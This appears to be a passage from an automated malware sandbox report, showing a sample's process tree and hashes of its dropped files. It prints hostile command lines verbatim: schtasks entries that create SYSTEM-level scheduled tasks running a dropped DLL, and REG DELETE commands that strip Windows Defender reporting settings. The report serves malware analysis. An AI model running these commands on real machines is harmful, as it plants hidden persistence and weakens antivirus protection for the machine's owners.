C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DNDvMcbpefrYjKZ2" /F /xml "C:\Program Files (x86)\SHsJRQZsU\RGdQoxZ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "DNDvMcbpefrYjKZ"3⤵PID:1696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "DNDvMcbpefrYjKZ"3⤵PID:956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WEhIDiLYPHjasB" /F /xml "C:\Program Files (x86)\ATZmuaBwNwmU2\vHdfesF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uMLBCyigOFctO2" /F /xml "C:\ProgramData\fxkldoUMcXUSOxVB\Ilhkgaa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kiDkdQMpQtFhhDeJz2" /F /xml "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\gBJLOqM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VjVOLqrPjSeucnEqiOK2" /F /xml "C:\Program Files (x86)\aJAQLsoDkiWqC\kLwflSj.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mDNVJgqIdbaAfzWWp" /SC once /ST 09:47:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MYjwJFnMfsmfKHMw\wVDWIjEx\XrjXfeX.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "mDNVJgqIdbaAfzWWp"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1612
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1728
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1496
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VgOpnHVQDAdMZqNFB"3⤵PID:1480
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\wVDWIjEx\XrjXfeX.dll",#1 /site_id 5254032⤵PID:1392
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MYjwJFnMfsmfKHMw\wVDWIjEx\XrjXfeX.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1540 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "mDNVJgqIdbaAfzWWp"4⤵PID:1600
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1448
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1748
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-14011000421826302707545745172-1317926225-993263090895299043-1360774784-1674349940"1⤵
- Windows security bypass
PID:880
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "848695570-2105355464-1457440073238266163-633166469879364812561295091853871227"1⤵PID:1720
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1824
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5829848862eec0a1fe07f6e4946e411a0
SHA1d11a62aeb524d5ec933ec9ba84ad32a88cdc49ce
SHA2560fb4ea2345c7e6a439ee04044d094b5ed79020eb0f7fc6f5fbb52b0a07d5462f
SHA512becaae5334fedb0d43b775957462f48cceb5f7b722ca641a7672ca274782c564406864402ff76a9a867c5bc450d41f09e83a630f356b713721e84b76ed84eb0e
-
Filesize
2KB
MD59534bafb79dccbb112cdbe389f0a42f6
SHA10bae6183f3d84d3942d24f5f0c191ebe0f60c3d6
SHA25635f78f8e2f07d7d686f46c9f84951923b9a688f8b2b743913d1608828962e2a2
SHA512e5a9a5b8247a3a2dc54dd6febd3dc9909ec3126455b830898e231b0e555307725cc52fa847285d0ebad4fd1962dd4b42051503c553b5e2e53365dfd170ba2c0c
-
Filesize
2KB
MD5dc9bc7b564df5df8b7522579420d76e6
SHA15e0fdb0e801d5e965c1fd73920fd32cd37d0bb33
SHA2567c27fa0df5e99c8aba7690d7b9c11ad0bb226ee12717eeb252f6d99cf8c4715c
SHA5125c339be21dbfc0c1cbb392d2f7587147bdd9ac7b4ac9c3e8865a4f65e0b129c6e1f0f60a1ee0d36800bbd8fee1fa90d76c15dd273a77b86b2a814812efdce2ff
-
Filesize
2KB
MD52c40e692c602d48cc74b082bed64a750
SHA1c9bae9afa7620fe618e7f3e135d9c8b718d62018
SHA256df8016cb0242e5f4021fa7ccee71dfbabe99b22824d1d380b8be0616993aacc8
SHA51233303e1025c7d4b84b010ce29f3d8ad01896563431761a00005fbd30af16340f35f2d25edbb568c10ccd721e22fff0cf4a3e8503437fa1a8dd21e6dd7377c244
-
Filesize
2KB
MD56657d633f621681734a85179eddee7bb
SHA1d5fd7825a5840db05248a91fc2b2c8a6260e03f3
SHA256301f548b2163d23277132e23612cfb8aaa1a95d7df718f5782b88b590cf98337
SHA5125ded05f7db2a1f067c4b752046384e09a7b8beeec44840598cdaa55c1b68882a2c1fee99f52df35c63110e9d93baf63394320973a37d5d93c519f52dd5b9476f
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ae7dfdcb45d2e603513cb9b6faa054b1
SHA16cd7db6d76a350ca17ab7ce9b9f87305388f204d
SHA2563ed135e5aad443c40bc3deb631385ddbf7cc54c6344f04672ec49f65f8c79f5b
SHA5129e2f17dfe9681bd349b296d3f31b4ab77048943110cf18aff300a3b7cc44eac19a9f1ce6e0704126ad2a3f6f430baba9ec97d8d913d484a68f64dfefc05c355b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58ee4f902cc5698927ae7c10358375263
SHA1d9ae3f2d6a7e854633f59540532e193a59b924b9
SHA256331580d68918c6ae1ab4f42957198c28a49c06575e28c0f9e53d724dc4f1606d
SHA512a832527000e5b4060c8b2de884c15f352a5637f278a47629328eda3a9057ead9b5179f31389881d0a4c538441ca9bc4940b63a110e88b7e07d0b74833b68dba3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5cb8df0b21e174b38ee7358d7c84bdd75
SHA16aa0fcd6211d9f07959f5b451298ceb3302aabe9
SHA25644df84fb997f4e886015f85ddb09a5c8bdca0c946dcd0fc2d80a9bca7066b94b
SHA5127e0095f5cd15fd18e5dbba8125a8bec745faa678cbb600e63ffe08b39a5c30ef6360e829df1a433d0a8e8eb7476702ea5bde6e804d2ec90ac696aa478c28abeb
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
8KB
MD54a68280693bb7ebe42f83051a4dc3200
SHA1d01b9e77b19a196a0b333ea790e305c5b085c94f
SHA2563dbe5b7b35ba052c986f4622971ac664a0e2aa2e19936b1f50ff453b423aa63f
SHA5122e700c2ea16b684194ee8559d84e462146eb96dc79dea3b7b7711e0d73d7939abb39920fe2729438115d675530872138594a85c2fc3440e196e9e7e3397cbea0
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
5KB
MD5e2436407f179c09e369dd38df9fafcc6
SHA1d0fba43460b9348336da2e405a69c463f7573e82
SHA2562f936e14255a9c0b6ccb4772f00504d34aa3288ea431680752a84ad1f9196d14
SHA512ff3bb873625f685b707f056990c9735e53d156d2ea599de6f6568632d84b9fccf1ac8efc0fe457c1588d92c0cfb9c0c5ca07503ca9d27183d223f172023599ae
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
6.4MB
MD5976264ea590e4bf32aa454c63447613d
SHA107083d0d0d9133f7414f6782737d8f014a98ab01
SHA25600ad00a77c0f2995a4b583ac7289bcb09d755862b96d62a039228f16b91f3ba8
SHA5121e79e0dc50881f9bc0f5b1bbabceb1ef0b037264520734578e9b25acbb04e487e2261cc89ecea360b8757285c16c33c0ecd83d236d4d26b7380b85cba8f300c3
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
7.0MB
MD554042a806886288ad60c64e7adaa2f53
SHA130ee71d3a30dff86dad3224ea57d844e18505cc1
SHA256facea1184fa61e0191fce707f9b9b137c5f5e96a687a7b9d944cc64b546d2487
SHA512a3a73e500662bf3398936fd3acf4bdf4755abaf80379c7ab37c614014d48bb4b977108c660fd8942e2927562978cee5c2fbe6f29391ff98c26c1dd4ab4550001
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d
-
Filesize
6.2MB
MD520ec46e9ba6365aa20cbd0901c403290
SHA10111156a4df15b72e0aec47889d18c867e600aca
SHA2567bfae3944f725b82aafdf29968fe6d1155131be480f5e8559410dc824609b6ba
SHA5126dfef0d8bd76166ddfbda8dffe4604d8443e02267daf3b6e2c990151a833352ad245e4510416e5d327969614e36158f6ed67299a5da6dcf29dcd18a7132c3d5d